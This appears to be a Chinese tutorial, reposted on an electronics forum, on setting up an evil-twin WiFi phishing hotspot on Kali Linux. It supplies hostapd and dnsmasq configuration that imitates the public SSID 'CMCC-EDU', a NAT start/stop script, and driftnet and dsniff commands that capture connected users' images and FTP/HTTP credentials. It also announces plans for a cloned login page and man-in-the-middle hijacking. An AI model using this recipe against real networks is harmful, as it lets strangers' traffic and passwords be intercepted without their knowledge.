0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

kali下搭建WiFi釣魚(yú)熱點(diǎn)

jf_Fo0qk3ln ? 來(lái)源:菜鳥(niǎo)學(xué)信安 ? 2023-07-18 15:32 ? 次閱讀
linux下建立無(wú)線熱點(diǎn)并不像在windows下開(kāi)啟網(wǎng)絡(luò)共享或者使用無(wú)線網(wǎng)卡驅(qū)動(dòng)設(shè)置AP模式即可。

linux下的無(wú)線共享要用到兩個(gè)軟件:hostapd(創(chuàng)建無(wú)線熱點(diǎn))、dnsmasq(dns服務(wù)和dhcp服務(wù)).

  1. 安裝以上兩個(gè)軟件:

apt-get install hostapd
apt-getinstalldnsmasq

2. 配置hostapd.conf文件

很多教程上說(shuō)配置/etc/hostapd/hostapd.conf文件,但是初次配置時(shí),在/etc/hostapd/下并沒(méi)有發(fā)現(xiàn)這個(gè)文件。

好吧,用linux的強(qiáng)大查找功能吧:

# find -name hostapd

靠,沒(méi)有。這個(gè)可以有!趕緊google一下,在網(wǎng)上可以直接找到hostapd.conf文件,如果直接copy下來(lái)放到/etc/hostapd/來(lái)可能版本不同不兼容。

想了想,應(yīng)該在/etc/(畢竟是個(gè)配置文件),在到/etc/下找找吧:

/etc# find -name hostapd
發(fā)現(xiàn)以下文件:
./default/hostapd
./init.d/hostapd
./hostapd
./network/if-post-down.d/hostapd
./network/if-pre-up.d/hostapd

進(jìn)去看看:

e0634582-2502-11ee-962d-dac502259ad0.jpg

在該文件中發(fā)現(xiàn)了hpstapd.conf.gz文件,它 的位置是/usr/share/doc/hostapd/examples/

好吧,應(yīng)該找到了,只是壓縮了,解壓吧。注意還要修改上圖的文件,將#DAEMON_CONF=“”修改成上圖形式的(我的已經(jīng)修改好了)。

DAEMON_CONF=/etc/hostapd/hostapd.conf

保存并退出,將 hpstapd.conf.gz復(fù)制到/etc/hostapd/下:

#cp/usr/share/doc/hostapd/examples/hostapd.conf.gz/etc/hostapd/

進(jìn)入/etc/hostapd/目錄下,解壓:

/etc/hostapd# gzip -d hostapd.conf.gz > hostapd.conf

現(xiàn)在可以編輯hostapd.conf文件了:

#cd/etc/hostapd
/etc/hostapd# vim ./hostapd.conf

去掉前面的注釋(去‘#’),并修改以下的:

interface=wlan2             //設(shè)置要做為AP的網(wǎng)卡
driver=nl80211              //設(shè)置無(wú)線網(wǎng)卡驅(qū)動(dòng),一般都是這樣(也可以具體的,如rtl871xdrv)
ssid=CMCC-EDU               //設(shè)置熱點(diǎn)的名稱,CMCC-EDU你總該連吧~
hw_mode=g                   //(默認(rèn))無(wú)線模式,這里是默認(rèn)的
channel=6                   //無(wú)線頻道(1、6、11三個(gè)頻道互補(bǔ)干擾)
macaddr_acl=0               //(默認(rèn))MAC地址過(guò)濾規(guī)則,設(shè)置為0即有規(guī)則的話就啟用
auth_algs=1                 //設(shè)置為開(kāi)放無(wú)線模式

其他的默認(rèn)就好,當(dāng)然你也可以仔細(xì)研究這個(gè)hostapd.conf文件(如果你的E文好的話...),最后會(huì)說(shuō)說(shuō)支持WPA加密的設(shè)置。

接下來(lái),是配置dnsmasq.conf文件:

vim/etc/dnsmasq.conf

修改為如下圖形式:

e0705f60-2502-11ee-962d-dac502259ad0.jpg

設(shè)置內(nèi)核支持IP轉(zhuǎn)發(fā),編輯/etc/sysctl.conf文件,去掉“# net.ipv4.ip_forward=1”前面的#去掉:

e07673dc-2502-11ee-962d-dac502259ad0.png

現(xiàn)在就可以啟動(dòng)我們?cè)O(shè)置好的偽造熱點(diǎn)了,這里直接寫(xiě)成了一個(gè)腳本:

#! /bin/bash


case $1 in
    "start")
       sleep 1
       ifconfig wlan2 192.168.10.1 netmask 255.255.255.0         //無(wú)線熱點(diǎn)的接口wlan2
       sleep 1
       echo "1" >/proc/sys/net/ipv4/ip_forward
       sleep 1
       iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE     //這里我上網(wǎng)的網(wǎng)卡是wlan0,如果是網(wǎng)線的話就是eth0
       sleep 1
       /etc/init.d/hostapd start
       sleep 1
       /etc/init.d/dnsmasq start
    ;;
    "stop")
       /etc/init.d/dnsmasq stop
       /etc/init.d/hostapd stop
       sleep 1
       iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE     //同上
       sleep 1
       echo "0" >/proc/sys/net/ipv4/ip_forward
       sleep 1
    ;;
    *)
       echo "Usage $0 {start|stop}"
    ;;
    esac

取個(gè)名字AP-wlan0,再給它加個(gè)可運(yùn)行權(quán)限,并放到/etc/init.d/下:

chmod+x./AP-wlan0
cp ./AP-wlan0 /etc/init.d

啟動(dòng)服務(wù)腳本:

service AP-wlan0 start

啟動(dòng)之后,如圖():

e07f6e9c-2502-11ee-962d-dac502259ad0.png

好了,手機(jī)連接上試試~~

e090f84c-2502-11ee-962d-dac502259ad0.jpg

由于我這有CMCC-EDU的無(wú)線信號(hào),為了便于區(qū)分,我把偽造的熱點(diǎn)改為CMCC-EDUU,

用driftnet抓去網(wǎng)頁(yè)圖片看看:

driftnet -i wlan2

效果很明顯哦^_^,driftnet還可以捕獲音頻的哦,詳細(xì)去看說(shuō)明吧

當(dāng)然,這個(gè)時(shí)候打開(kāi)dsniff和wireshark的話,所有的數(shù)據(jù)都可以抓下來(lái)了,中間人攻擊、ssl等各種劫持都可以哦,這個(gè)我也在研究。。。

dsniff指定端口嗅探:

dsniff -i wlan2 -t 21/tcp=ftp,80/tcp=http

由于我這里在克隆CMCC-EDU登錄界面時(shí),它做的有點(diǎn)變態(tài),還得修改點(diǎn),所以暫時(shí)先寫(xiě)到這了

PS:下一步就該輪到我的樹(shù)莓派上場(chǎng)了,親看下回分解`_`

補(bǔ)充的:

配置hostapd.conf文件支持WPA加密:

interface=wlan2
driver=nl80211
ssid=mywifi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
ieee80211n=1
wpa=2                                //WPA2加密模式
wpa_passphrase=mimanicai             //密碼(即wifi密碼)
wpa_key_mgmt=WPA-PSK
wpa-pairwise=TKIP
rns-pairwise=CCMP


//其他的默認(rèn),kali默認(rèn)用vim時(shí)是沒(méi)有高亮顯示的,建議設(shè)置成高亮的以便于查找,怎么設(shè),自己google吧


聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • WIFI
    +關(guān)注

    關(guān)注

    81

    文章

    5268

    瀏覽量

    202764
  • 無(wú)線網(wǎng)卡
    +關(guān)注

    關(guān)注

    0

    文章

    103

    瀏覽量

    25479
  • kali
    +關(guān)注

    關(guān)注

    0

    文章

    13

    瀏覽量

    3915

原文標(biāo)題:kali下搭建WiFi釣魚(yú)熱點(diǎn)

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    什么是wifi熱點(diǎn)

    把手機(jī)的接收gprs或3g信號(hào)轉(zhuǎn)化為wifi信號(hào)再發(fā)出去,這樣,你的手機(jī)就成了一個(gè)wifi熱點(diǎn),手機(jī)必須有無(wú)線ap功能,才能當(dāng)做熱點(diǎn)?,F(xiàn)在有些系統(tǒng)自帶建
    發(fā)表于 03-27 10:52 ?1.3w次閱讀

    讓你的電腦變成Wifi熱點(diǎn)

    讓你的電腦變成Wifi熱點(diǎn)。我這個(gè)人比較喜歡躺在床上用手機(jī)瀏覽網(wǎng)頁(yè),而且室友在玩我電腦的時(shí)候我就不那么無(wú)聊。前幾天因?yàn)槭謾C(jī)流量所剩無(wú)幾,就在考慮能不能把筆記本變成一個(gè)WiFi熱點(diǎn),然后
    發(fā)表于 01-07 14:24

    任天堂WiFi熱點(diǎn)覆蓋全美機(jī)場(chǎng)

    12月9日北京報(bào)道稱:任天堂在美國(guó)42個(gè)機(jī)場(chǎng)中增加了總共兩萬(wàn)九千個(gè)支持3DS的WiFi熱點(diǎn)。新增加的熱點(diǎn)由Boingo公司搭建完成,由于新熱點(diǎn)
    發(fā)表于 12-13 10:46

    樹(shù)莓派+Kali Linux:搭建一個(gè)偷WiFi密碼的黑客站

    破掉別人的Wi-Fi密碼、套走賬號(hào)、利用漏洞測(cè)試網(wǎng)絡(luò)絕對(duì)能讓人成就感爆棚。想變身黑客爽一把嗎?你得先弄臺(tái)便攜黑客站,并熟悉Kali Linux和樹(shù)莓派(樹(shù)莓派)。不會(huì)沒(méi)有關(guān)系,我來(lái)教你
    發(fā)表于 11-03 17:54

    樹(shù)莓派+Kali Linux=WiFi密碼,客官,這里看

    `破掉別人的Wi-Fi密碼、套走賬號(hào)、利用漏洞測(cè)試網(wǎng)絡(luò)絕對(duì)能讓人成就感爆棚。想變身黑客爽一把嗎?你得先弄臺(tái)便攜黑客站,并熟悉Kali Linux和樹(shù)莓派(樹(shù)莓派)。不會(huì)沒(méi)有關(guān)系,我來(lái)教你
    發(fā)表于 11-24 14:34

    【BeagleBone Black試用體驗(yàn)】結(jié)貼:所見(jiàn)非所得——使用BeagleBone Black Industrial 進(jìn)行無(wú)線安全演示

    傳統(tǒng)的WiFi釣魚(yú)攻擊效率要高得多。能讓攻擊效果發(fā)揮至最佳狀態(tài)的場(chǎng)所就是戶外,這種情況STA設(shè)備處于未連接狀態(tài),因而會(huì)不停的廣播連過(guò)的熱點(diǎn)(夾帶在Probe Request包中)嘗試
    發(fā)表于 11-17 18:02

    如何用樹(shù)莓派搭建釣魚(yú)WiFi熱點(diǎn)

    最近在做一個(gè)實(shí)驗(yàn),用樹(shù)莓派搭建一個(gè)釣魚(yú)WiFi熱點(diǎn),但是hostapd,dnsmasq的設(shè)置老是有問(wèn)題,請(qǐng)大神來(lái)看看給我指點(diǎn)指點(diǎn)吧,一直卡這兒,愁死了。還希望能幫我完成這個(gè)實(shí)驗(yàn)。
    發(fā)表于 10-11 00:11

    Kali Linux入門(mén)

    文章目錄第1章 Kali Linux入門(mén)1.1 Kali的發(fā)展簡(jiǎn)史1.2 Kali Linux工具包1.3 下載Kali Linux1.4 使用Ka
    發(fā)表于 07-22 08:54

    如何防范釣魚(yú)wifi

    天涯網(wǎng)帖的火爆傳播,讓釣魚(yú)WiFi臭名遠(yuǎn)揚(yáng),也讓不少對(duì)于技術(shù)不太精通的用戶聞之生畏。有關(guān)專家指出,只要用戶增強(qiáng)主動(dòng)防范意識(shí),并建立良好的WiFi使用習(xí)慣,就能夠防止墮入釣魚(yú)
    發(fā)表于 03-19 11:42 ?5425次閱讀

    wifi熱點(diǎn)源代碼

    wifi熱點(diǎn)源代碼
    發(fā)表于 02-07 17:20 ?69次下載

    Kalissh爆破以及nikto工具漏洞掃描

    Kalissh爆破以及nikto工具漏洞掃描
    發(fā)表于 09-07 09:56 ?6次下載
    <b class='flag-5'>Kali</b><b class='flag-5'>下</b>ssh爆破以及nikto工具漏洞掃描

    免費(fèi)Wifi連接需謹(jǐn)慎 小心釣魚(yú)陷阱

    大家知道嗎,在那些公共場(chǎng)所的一些免費(fèi)WiFi熱點(diǎn),有可能就是一個(gè)釣魚(yú)陷阱,而家里的路由器也可能被惡意攻擊者輕松攻破。我們?cè)诤敛恢榈那闆r,就可能面臨個(gè)人敏感信息遭盜取,登陸這些無(wú)線網(wǎng)
    發(fā)表于 01-02 15:36 ?2451次閱讀

    會(huì)用kali破解wifi嗎?

    準(zhǔn)備好 [kali] 系統(tǒng),電腦可以鏈接無(wú)線 wifi!! 使用 Aircrack-ng 進(jìn)行暴力破解,linux 上已經(jīng)安裝此工具!
    的頭像 發(fā)表于 12-05 11:54 ?1480次閱讀

    Android終端搭建kali滲透測(cè)試環(huán)境

    Kali Nethunter是一款用于安全研究的手機(jī)固件包,可以使Android設(shè)備增加"無(wú)線破解"、"HID攻擊"、"偽造光驅(qū)"等的硬件功能以及metasploit等軟件工具??梢苿?dòng)使用,十分方便快捷,為Kali Linux的手機(jī)版本。
    發(fā)表于 02-01 10:07 ?3742次閱讀

    如何使用kali破解wifi密碼

    1、支持監(jiān)聽(tīng)的網(wǎng)卡一張(大概20多塊錢(qián),不貴) 2、以及安裝kali的VMware kali官網(wǎng) kali是什么? ——kali就是一個(gè)專門(mén)用于滲透行業(yè)的Linux發(fā)行版本,里面的工具
    的頭像 發(fā)表于 06-19 10:11 ?2258次閱讀
    如何使用<b class='flag-5'>kali</b>破解<b class='flag-5'>wifi</b>密碼